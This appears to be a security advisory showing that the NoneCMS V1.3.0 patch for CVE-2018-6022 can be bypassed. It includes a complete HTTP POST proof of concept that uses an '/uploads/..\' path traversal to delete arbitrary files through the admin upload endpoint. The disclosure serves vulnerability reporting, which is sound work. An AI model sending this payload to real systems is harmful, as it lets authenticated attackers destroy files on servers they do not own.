The latest patch V1.3.0 of NoneCMS has a directory traversal vulnerability

[ghost]

The latest patch V1.3.0 of NoneCMS has a directory traversal vulnerability in application/admin/controller/Main.php. The vulnerability allows remote authenticated users to delete arbitrary files by leveraging back-office access to provide a ..\ in the path parameter which prefixes with /upload/.

In order to fix CVE-2018-6022, the NoneCMS author made the following changes to the file application\admin\controller\Main.php: https://github.com/nangge/noneCms/commit/ff3fc6d03844f1f33109b2bc4ffe3aa5fb4b2038#diff-0eaf9046c434434ca7b2b0d5e0fa0293

We can see that the patching measure is to check if the path parameter's value prefixes with '/uploads/'. But we can still bypass it by adding the '/uploads/' prefix in combination with '..\' to implement directory traversal attack which can delete arbitrary files.

So PoC is as follows:

POST /nonecms/public/index.php/admin/main/upload.html HTTP/1.1
Host: 172.23.64.227:88
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.23.64.227:88
Referer: http://172.23.64.227:88/nonecms/public/index.php/admin/flink/edit/id/2/type/2.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: thinkphp_show_page_trace=0|0; thinkphp_show_page_trace=0|0; thinkphp_show_page_trace=0|0; PHPSESSID=bs9k1rlmqt1qd0hsq9etv8co90
Connection: close

act=del&path=/uploads/..\..\..\..\test.txt

Before sending payload, we create a test.txt in this directory:

When we send payload, the test.txt file is deleted: